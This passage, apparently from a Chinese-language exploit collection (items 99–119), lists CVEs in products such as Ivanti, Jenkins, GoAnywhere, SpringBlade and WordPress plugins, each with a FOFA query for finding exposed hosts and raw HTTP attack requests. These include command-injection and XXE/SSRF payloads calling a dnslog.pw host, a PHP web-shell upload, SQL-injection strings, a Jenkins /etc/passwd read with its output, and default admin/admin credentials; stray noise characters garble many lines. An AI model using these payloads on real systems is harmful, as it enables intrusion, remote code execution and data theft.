' D Z. U: R5 ~2 XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 N( n" ^' _- R% ^$ i3 |4 C
Content-Type: application/x-www-form-urlencoded; charset=UTF-8$ \* c# x# O+ l. ~
X-Requested-With: XMLHttpRequest4 O# x7 b1 n8 _, O% Z- E) S6 }
6 V( ?& Y( J4 G1 S% mid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
6 Y2 ?$ ?+ U6 N# ]; _3 I! i$ y
) Y @+ l7 v; r+ q99. Ncast盈可视高清智能录播系统busiFacade RCE6 `, \! ~* r: f+ \4 w
CVE-2024-03059 r$ b$ P% |$ g l* ^3 B% [; T
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
- n) v+ {8 W+ l: m. lPOST /classes/common/busiFacade.php HTTP/1.1+ ^* p4 Q0 U8 Y8 S$ U% I% n; u! _
Host: 192.168.40.130:80807 l# h! T$ E, N; V# c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ F3 P- v- c9 A, B% Q
Connection: close! h w# t7 I2 d$ D: m
Content-Length: 154
( v' P, l5 n0 `; ]' IAccept: */*
' R v$ Z/ I% {- TAccept-Encoding: gzip, deflate
1 O* y3 l/ J6 D5 o) qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 l' C, W7 S8 q' L% `- I. k9 ~
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
: ]. P; u# P6 ]$ R/ x+ FX-Requested-With: XMLHttpRequest1 l8 W1 u6 ]7 f$ K' f
% z6 M5 A7 @. F0 z- e6 I%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D1 U6 `! H$ P8 d! \0 Q/ }) L
- C+ n2 n5 f3 M; B' z4 r& I2 ? o2 y1 c+ Y" l( Z
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传4 e B6 s/ ^* c
CVE-2024-0352% R1 A1 K, A9 }$ f; s( ~, {* ?" }
FOFA:icon_hash="874152924"
: ^8 B' h7 c% ePOST /api/file/formimage HTTP/1.1 n: {4 H/ R- T9 ^* x+ T2 o
Host: 192.168.40.130/ f8 S; Z$ C, n2 _6 P- w( T
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.363 B& N3 |/ g* h0 a* L+ x( S
Connection: close% i$ R! R; c1 {9 |
Content-Length: 201
( x! ~0 B: u4 z' z7 l! y' FContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
( G# d; w" W, f" b* N: M! G6 KAccept-Encoding: gzip
# W3 A& v! ^2 F8 X, @1 Y) r ]$ R6 }3 T
------WebKitFormBoundarygcflwtei
5 V2 m9 W6 C2 ~4 g$ E. Z- E" {Content-Disposition: form-data; name="file";filename="IE4MGP.php"
9 H5 O9 C- w) S) T1 f! @) h+ LContent-Type: application/x-php% V9 z) T% Q# _ K1 ?- w6 |# D- _7 c
1 R" _+ x4 b# ^9 |8 w! N, D
2ayyhRXiAsKXL8olvF5s4qqyI2O
% d u% e& O. ]* H' z2 y------WebKitFormBoundarygcflwtei--6 S& e' P! o& s8 n2 ?8 W$ R
3 T3 W8 V; q4 s1 l$ H
# n% b- G3 m# O9 R% U101. ivanti policy secure-22.6命令注入
9 e' ~/ \) q& {$ J1 b" i5 yCVE-2024-218877 q; W' q7 n& Y% G
FOFA:body="welcome.cgi?p=logo"
; g0 ]8 r2 m9 ^. s8 D) ^GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
( o# {- ~- M& q* a8 V1 MHost: x.x.x.xx.x.x.x
/ S$ Y+ ?. K' g3 j% H7 u. J( V6 [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ G+ \, _# q1 E R, WConnection: close
( ?, g4 N2 G: R, PAccept-Encoding: gzip
2 W1 M7 u" I3 t1 I% O
8 A3 K# W; y* h! T( H' Y: D# a" f' c5 z" g L
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行' `5 h8 @/ e8 D' Q- @1 `; [( ]9 \
CVE-2024-21893
, ^3 M i6 L6 ]8 ?FOFA:body="welcome.cgi?p=logo"
& ~( I; P! e {3 I; i& M' zPOST /dana-ws/saml20.ws HTTP/1.1
, G7 t } d9 |. _Host: x.x.x.x
' b3 } b$ V5 ~0 E/ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 n# \# W: Z' a4 b9 tConnection: close
( W$ W. u* B, c* h( F9 `Content-Length: 792* t P% a; M6 X n- _; t
Accept-Encoding: gzip
9 D+ p* N" U! ^) t% R- f4 F" C" q! ?: E
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
. A7 v' N' {1 a& m* i5 }7 D/ u0 ?/ H0 Q# l/ B
103. Ivanti Pulse Connect Secure VPN XXE# T1 K! V0 c8 B- t3 B1 D
CVE-2024-22024
+ u2 H1 \2 a. O1 c( kFOFA:body="welcome.cgi?p=logo"5 t0 I$ D9 C4 y1 M, a1 q% f
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
" C: m4 u* o- O3 zHost: 192.168.40.130:1112 c; U- H7 ?) n- E
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( k# i' ]1 g( \) U: ]
Connection: close* R; Z* H9 A* D- v. L ~
Content-Length: 204
' b4 d8 z$ Z* b% ]5 E# ^Content-Type: application/x-www-form-urlencoded
3 [1 z. p5 M+ C9 NAccept-Encoding: gzip; L" O C+ m, ~1 ?- i, ?
0 ` r- J2 g1 W) t: q5 T
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
8 H" a7 W8 Y0 u
/ Q& O% I# _. Y9 Z: I$ l, Q+ T6 D% ]" w
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下- y6 m! j6 S( Q& L+ i( d2 | N
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
, A* q& `- w6 p; `) ~2 h- s2 l0 L9 G! z1 h" l
( c! g3 O2 D" u; i$ K; Y104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
" X( I0 i# h- j( M8 |CVE-2024-05697 c9 D$ B" }: I
FOFA:title="TOTOLINK"- p8 \: d6 R- u0 I- ?- r2 \
POST /cgi-bin/cstecgi.cgi HTTP/1.1
* n+ x7 i7 f5 D/ p- mHost:192.168.0.1
b, g1 ]6 G! G5 c1 P3 g* ^Content-Length:418 ]1 j' {+ H' _
Accept:application/json,text/javascript,*/*;q=0.01/ `/ W" D+ J- Z" W2 w. a6 G: Z: N, p
X-Requested-with: XMLHttpRequest
1 N- [3 H; f7 E3 A% tUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36% i7 @9 D4 |1 g( \& u6 R1 J, M
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
: ?; ?4 O4 F U* pOrigin: http://192.168.0.1, F4 M6 M t; p& ]7 e# w$ \2 x' {
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
3 z4 T4 `7 N+ ^* k6 cAccept-Encoding:gzip,deflate6 j0 t, m$ h, `# a2 f8 T; e4 @0 v
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
( }0 A0 z9 n7 ~6 zConnection:close1 h3 e0 T) t$ x; `
" J5 c2 T8 K. v& t$ U; _* f{% V4 x) o- D: T5 @5 P9 g4 g
"topicurl":"getSysStatusCfg",! E: \. y, U4 v; ^3 s F j2 F
"token":""$ g, F1 q+ {& O6 s- G
}
, h% o6 X8 i" p5 z9 q
* }" }. u4 p& Z- h" E: o+ { [' X105. SpringBlade v3.2.0 export-user SQL 注入
/ B) [' I- [! _FOFA:body="https://bladex.vip"
. }/ @$ ~! Y# N vhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1) g6 N- Q9 L8 u" j
& @9 j- n* S- D% I- t3 G
106. SpringBlade dict-biz/list SQL 注入 G6 v0 c* s4 `$ R" `( Z- i" s
FOFA:body="Saber 将不能正常工作"' V, Q9 n* I, V5 }
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1: d) t; r, R* O9 ~
Host: your-ip
6 j6 ]$ @, @$ r1 @7 U0 i, V+ |: L1 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ b$ W$ X& W9 U3 b! T
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A& N3 E% h. T1 m" H) j' R! a; b
Accept-Encoding: gzip, deflate
* A) a. U9 ^ u& s0 FAccept-Language: zh-CN,zh;q=0.92 o y+ e7 N' B& c
Connection: close
% |# A( @9 D; Q2 ]7 \1 t; Z! l1 c: J! C, @) }! D
3 I) I1 n& [7 h! j3 B: n' L107. SpringBlade tenant/list SQL 注入
* W3 S( I; {: e# v" m3 SFOFA:body="https://bladex.vip"
" j/ w, n$ |% E/ ZGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.19 L |' t6 U+ X A* \! P
Host: your-ip
0 h% X' y, b' l! p9 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 w0 G, o% X9 X5 m) `
Blade-Auth:替换为自己的( p' Y- ]+ {8 m/ S
Connection: close4 i j7 \% S. G M& i+ c; c0 V5 S
, X5 |. \% ~ e0 V
; q8 q9 x9 P0 c4 b- O O/ I108. D-Tale 3.9.0 SSRF7 K, s4 y5 T# {, v+ i2 ]) D
CVE-2024-21642
1 K0 q" c8 ?6 F* j' b _) b8 M5 eFOFA:"dtale/static/images/favicon.png"* B# w& b+ f, o! f1 @3 \) ~
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.18 Q: u+ k% m) H2 @) w
Host: your-ip {/ p3 `; q( z: P0 @8 ^
Accept: application/json, text/plain, */*
& t* K) w" Y; T9 ~; R, EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 `' e" w1 ^! K, k B3 ^Accept-Encoding: gzip, deflate. n+ M3 G( o5 V- o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
2 a2 m( a, a ?1 _0 \( Y) t2 C0 z+ XConnection: close& I+ {+ }& m& C: S5 s4 Y/ ^, k/ Q! `
7 a# L( z& v- ]. ^0 z" ]: g$ j- A! _8 a- E9 a( E
109. Jenkins CLI 任意文件读取, d1 _" J O3 b- K
CVE-2024-23897. c% I; S+ S% Q1 G5 h
FOFA:header="X-Jenkins"
5 T3 L e( s& O9 C8 P) RPOST /cli?remoting=false HTTP/1.1) f! [' R% e$ C1 D. C
Host:. r3 w' v& K/ X2 B7 O& v, W: q
Content-type: application/octet-stream
, u0 _6 w) {) \4 W, ASession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
& E2 C; Z2 f0 T7 nSide: upload" E+ k" A; t9 L4 A' F, `; \4 ^
Connection: keep-alive
! p: j9 C; F ?, o5 j" o' lContent-Length: 1639 P- M6 W8 J7 Q9 _; n
7 [& V- I% ]! T1 e0 K' O6 E6 }b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
' W0 ?" I V4 u* l' w1 G8 y) `9 q! f3 `) L- N1 P+ z) Y+ |
/ C6 u, Z) D7 O. |/ N
POST /cli?remoting=false HTTP/1.1
) I% Z& X: g/ C% y- g+ {$ T5 G- UHost:& {! J) p* A' u6 S, x4 e
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
0 b) H2 R- E. O. \# K5 Ndownload* l. [3 D1 Q5 {8 E2 h7 N
Content-Type: application/x-www-form-urlencoded: o% p7 v- ~, }4 \; [4 D/ Y8 E
Content-Length: 0
7 F) ^+ G: v& E# y. I: [& V4 g7 ]" q* ^$ P
' ]# y2 ~% K% i$ b/ y" CERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
, a' {: r' i: k5 Yjava -jar jenkins-cli.jar help
# ?/ @, H" F9 ~- b1 S[COMMAND]: I% H }/ _% [2 E( J
Lists all the available commands or a detailed description of single command.
% D' C$ K+ C0 q8 P COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)$ q& Q8 E8 V" |1 e' v5 U" k8 x4 g. u
! J3 v7 ~2 N0 I
9 ?# ~4 M+ t# w. k1 |, D5 |/ Y110. Goanywhere MFT 未授权创建管理员
) p; Q7 a8 S5 f) a; aCVE-2024-0204$ h' ?+ R: E- t4 Z' g
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"" Z- X6 L/ b# z7 H( a1 s
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
1 A" H% {1 q- |1 k( I& sHost: 192.168.40.130:8000
0 F: g! u0 r2 k3 H( k& \9 [User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.368 P6 U% J3 S; F3 q0 z6 M3 c
Connection: close1 k# w. e5 @9 h. y
Accept: */*$ A: Q" W4 y1 K6 }: f. W p
Accept-Language: en; g2 N/ B2 V* q( w6 o: ?
Accept-Encoding: gzip3 z( ^4 E# c& g! u9 B
, ]' O5 Y( b- n0 H K! b
/ O! P. E. w% e' ? S9 y, v, W111. WordPress Plugin HTML5 Video Player SQL注入
4 L5 K V* ? XCVE-2024-1061+ j& I1 N, [8 p+ J) U# ?
FOFA:"wordpress" && body="html5-video-player"* D/ f7 @# Q6 |9 r% l
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
& Z0 F& ~' `( i& UHost: 192.168.40.130:112$ W% K" A) O3 K) @" T4 w9 Q+ c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 V3 U. h3 q3 B; p% |# M5 VConnection: close$ ]2 `5 C5 U" j- A# M# E8 Y
Accept: */*
8 O" i% j! S6 K) h4 g2 x- SAccept-Language: en
: i. Z4 X% C9 U. gAccept-Encoding: gzip* i7 S5 J! C: |1 W
; N! b5 P5 E; g2 |7 e+ K
/ S& j9 y+ h% V6 R8 I1 f* D; z# d
112. WordPress Plugin NotificationX SQL 注入+ H5 F, Z) F/ u1 ^6 j( R7 |
CVE-2024-1698
; R# w, [: n8 P) p0 HFOFA:body="/wp-content/plugins/notificationx"
1 R5 p1 Q# E8 L; V# VPOST /wp-json/notificationx/v1/analytics HTTP/1.1
: h0 r4 R# d1 |) t0 z) yHost: {{Hostname}}
& k! H: @' R& l3 s" W/ y. wContent-Type: application/json X$ T( Z# ?% t! A @7 I
" {9 x, P6 F8 {7 r$ f
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}+ Z/ v: i0 u1 X/ |
b3 [+ W6 {4 V! q1 J
/ a3 `# ]' b' D# P113. WordPress Automatic 插件任意文件下载和SSRF
% X, d- I, A3 b j. g$ j( Y- n* uCVE-2024-279544 q5 v& N. Y# B" D
FOFA:"/wp-content/plugins/wp-automatic"
8 p' O- l) ~; P, r0 ]2 \GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
( @$ h0 L8 u1 _- ?3 T% e% W9 `Host: x.x.x.x& _. h& ~% M* w3 P+ H
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
% b4 J+ F6 i/ Q# WConnection: close, \4 s/ w) C) f b n4 J" E/ j1 J
Accept: */*. D) a3 k7 ^% S: x- V* g* c- l# n
Accept-Language: en
5 o* x% C6 J$ t. F; P- AAccept-Encoding: gzip; k4 {0 X1 ~% \9 p0 G5 k* X
7 V: G1 @- M" ]: T8 p
* A8 Z4 z- |6 U4 Q7 e114. WordPress MasterStudy LMS插件 SQL注入5 J, I* p9 G+ I9 p5 z3 |
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
' m3 w$ n) p; K, `( WGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
; ?/ L7 O' u; r k. ]! mHost: your-ip, H/ F) z# t3 [2 m/ l
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. v6 x" P* s- M% Q Q- C1 XAccept-Charset: utf-87 h* [0 }2 R9 E7 X7 K0 H' G
Accept-Encoding: gzip, deflate* k- a: y+ s& @1 f( [* @; D% _
Connection: close
2 u& {% @" y; A5 l* K& l
7 L9 z- v2 @% m, h# ?8 m: t
; h# D9 W" H# P, Z5 s7 x% D: V# B# h115. WordPress Bricks Builder <= 1.9.6 RCE8 j& l0 H( W! ^) O2 y* N
CVE-2024-25600
( M& K$ I; H3 y( |/ Y% i, y) SFOFA: body="/wp-content/themes/bricks/"- l, g% @) h7 o# t% P
第一步,获取网站的nonce值$ v5 y+ V/ i% P1 H
GET / HTTP/1.12 H6 ~, e/ [$ ^8 T
Host: x.x.x.x9 \1 r% ^/ d% w: s$ |% v I: s
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
9 ^4 T1 M3 b4 n3 }. R( jConnection: close& A1 A' V8 }( A) V9 {1 E! z, ^) k
Accept-Encoding: gzip& `9 l7 h! t; F9 E9 T; b8 M
. E! r$ o5 ]% p, F
) G, A8 j& Q6 [2 z. B6 m6 o" M' u: I& K x第二步替换nonce值,执行命令4 n3 U- `6 W* l5 {# s; ~
POST /wp-json/bricks/v1/render_element HTTP/1.1* e8 j; L! @; {' l6 j ]. D" E
Host: x.x.x.x o& R. ~/ _4 Q5 d# q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36* |) m/ _# a2 a. ^, O
Connection: close
, z! A+ B8 ^0 \' z% uContent-Length: 356) j& N; n) d& E! o
Content-Type: application/json
( a' A4 H8 u; W* P/ mAccept-Encoding: gzip4 n F! [/ `$ F! T( c; P
9 e; R5 c( Y4 c, o
{( T* V7 {7 s- Y; J" ^, u" u9 s
"postId": "1",
* [7 v' e; \; q" W: B "nonce": "第一步获得的值",9 K7 R n( e. w% A8 Z+ a) s6 w
"element": {0 N; B: K- K5 w; {+ n3 R& k* O; p3 H
"name": "container",
8 _$ K4 \% J2 X) M% B3 \% U, f "settings": {+ h5 l* g8 A8 n5 E. `/ c& O* z7 v
"hasLoop": "true",7 I5 J8 Y5 M1 v) f% L0 ]! p1 b/ k5 X
"query": {6 U# a9 P f, u9 q% X
"useQueryEditor": true,
0 [* `1 H* @& I9 t$ o "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",6 D( o2 ], Y& s) l9 B& m+ ?; p8 W
"objectType": "post"
# I1 N8 G+ C8 N, w Z }
" G/ d8 O/ W6 S, R+ o( i3 l9 ~* e; z) t }9 R g/ y3 m/ k; |( t( n( _+ e( m3 H
}
+ M* |% V/ `/ R3 `' @3 n6 n! o0 r}
0 W5 R+ q, z& J/ k2 r1 ^; R) T) e( r- a, p
8 H6 H$ q9 t+ v- [, U
116. wordpress js-support-ticket文件上传
* R/ p: a8 w/ q, sFOFA:body="wp-content/plugins/js-support-ticket"/ e" u5 U3 ~5 i7 `8 S* y
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
% [! t$ j& K9 v4 e5 yHost:
4 I2 Y" ^3 w6 q+ W9 DContent-Type: multipart/form-data; boundary=--------767099171
" ?* A) @9 W/ H% z3 n$ q) |User-Agent: Mozilla/5.0 u% {- E8 I: c" y6 U( W! D6 y
$ h1 Y+ W. A! m+ s4 y+ D0 P" C$ Z2 ^
----------767099171
5 Z( E' H. I/ W8 a5 lContent-Disposition: form-data; name="action"6 E: U* Y6 ~6 K) i3 \% {! C
configuration_saveconfiguration; h: Z( o- C' u
----------7670991715 }0 a- S" ~3 W5 z7 t& I) c
Content-Disposition: form-data; name="form_request"
% ?5 ~ \7 z% M* r% S% vjssupportticket
& F4 o8 Z4 ?% M( q----------767099171, Y/ K% w# a$ p# ]! s* e
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
; W% f3 v$ c" Z8 w8 eContent-Type: image/png
' j( X, z8 A0 q- J4 r----------767099171--+ |, F+ N, v ^" M H0 Q
2 f' l/ \2 O3 B% A8 h0 q( g
' E* C" P* \9 Q( V117. WordPress LayerSlider插件SQL注入
4 y2 n/ c6 W* Z' bversion:7.9.11 – 7.10.00 ^+ a, Q/ P* B8 I& {& Q" X
FOFA:body="/wp-content/plugins/LayerSlider/"
! Z) {6 @. f4 D* h; _GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
/ R5 i. |& U5 w1 N* o; F1 WHost: your-ip
3 Y; W$ {" ]7 @* d4 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) I7 K& G! [# x0 U9 V) n8 t0 E) xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( {; r/ r/ e8 u. d! t5 K9 Q' zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& S/ N6 n. |8 k5 G+ j
Accept-Encoding: gzip, deflate, br
- P& g% s: a) J7 |! q% {) sConnection: close8 y$ g* ?; J; [! X/ f! ~
Upgrade-Insecure-Requests: 11 _& ~% ~9 W, P8 Y: o. w. `9 p0 z, \
! L" ?8 W& x- ~7 U8 {6 _
- F `+ o$ J; y2 d: E3 R0 v0 J
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
% g8 ~' ?0 k2 ^7 pCVE-2024-0939
9 c+ [; ^4 j0 g) m; ^FOFA:title="Smart管理平台"
3 u0 w" j3 ]2 g5 e8 t- u3 |2 k1 w/ UPOST /Tool/uploadfile.php? HTTP/1.1
8 [- f4 f( @: ]0 t4 qHost: 192.168.40.130:8443
7 ~, c0 H# A% v4 k' _! r) n5 ]Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
3 @- a6 _' W3 Q f4 F/ }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.06 ^. I2 _3 y4 V/ u2 `. ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 z& D- M4 a. P! t: N( V- }! CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 q/ I) q; j# J/ o( ^- _Accept-Encoding: gzip, deflate" o: f5 Q! }) d
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
; O4 h: h Z7 R9 f! ]$ z' E4 _Content-Length: 405/ N, ?3 s7 w! m$ |7 j) u8 p/ F9 E
Origin: https://192.168.40.130:8443
+ z6 G$ q. Q3 B! o9 d. }, |9 \Referer: https://192.168.40.130:8443/Tool/uploadfile.php
; i" S5 y: q! GUpgrade-Insecure-Requests: 18 d& H2 f+ B$ I" ]; K; V1 C
Sec-Fetch-Dest: document: s: f3 E- F& K: G3 p" s' g
Sec-Fetch-Mode: navigate
5 B$ ^* Z* h6 |' d; ^4 ZSec-Fetch-Site: same-origin [1 \% h- o2 s# N: f
Sec-Fetch-User: ?12 ^' e; c/ z+ f) j6 e! n% A
Te: trailers
; Z) a+ w/ M% V; A. p" Z: \Connection: close
* M9 N. Y9 b! j M6 c, l! e8 N, H! g5 h7 X" l) H
-----------------------------13979701222747646634037182887
+ c6 ^/ }9 N8 u& A4 t( jContent-Disposition: form-data; name="file_upload"; filename="contents.php"
, L5 h2 J( }, q. nContent-Type: application/octet-stream
# g/ l# L& y; _; m
2 f" K/ J5 I" V6 ^2 y<?php9 s8 c3 N# }. {7 x- Q* H6 K
system($_POST["passwd"]);) i- e4 m; j$ C
?>2 G5 s0 O6 l: j5 ~
-----------------------------13979701222747646634037182887
- n+ }, F5 ?( ~( u& R( _# iContent-Disposition: form-data; name="txt_path"9 V7 E) ?. s" m% j- S/ L
6 E6 z7 v0 k+ ~) q; b
/home/src.php
- N4 ^* H) j3 o6 |4 }1 e/ `-----------------------------13979701222747646634037182887--% V" K, k; Z+ l1 e6 B3 Z* ^( T' L( k
3 u4 ^, V0 @* E& i2 {
9 F9 S `4 }, m8 R/ T' e/ s访问/home/src.php8 z) y8 q5 d: P g! h8 X
/ S# c( a. {( Q* Q! \4 W6 B9 A119. 北京百绰智能S20后台sysmanageajax.php sql注入
! M2 o! L/ J$ f$ M: @9 P7 l: CCVE-2024-1254
: `( |: c; a5 lFOFA:title="Smart管理平台"/ [$ S2 N5 s; ~2 b( r" F5 T
先登录进入系统,默认账号密码为admin/admin
" C' T. {6 t6 fPOST /sysmanage/sysmanageajax.php HTTP/1.11
! z/ A. A# N6 L; ?* k N) Y% o7 L1 JHost: x.x.x.x
1 O+ @; M f2 @% p5 k+ e/ M& u9 S8 f7 MCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
) E2 M8 j0 W% J* t( a0 d; uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
R3 P, }" m) ~Accept: */*
3 I, B/ s- y; i- H8 N# EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; D2 u* T1 C2 Q% Y
Accept-Encoding: gzip, deflate
, i7 D( o; Y2 HContent-Type: application/x-www-form-urlencoded;
! a( U# \7 c* PContent-Length: 109& z( ]" t# _4 F5 K2 U
Origin: https://58.18.133.60:8443
% N0 f& f$ R* }Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php7 P6 @* F8 Q2 J2 L
Sec-Fetch-Dest: empty3 B6 K* `; d) P* k8 }
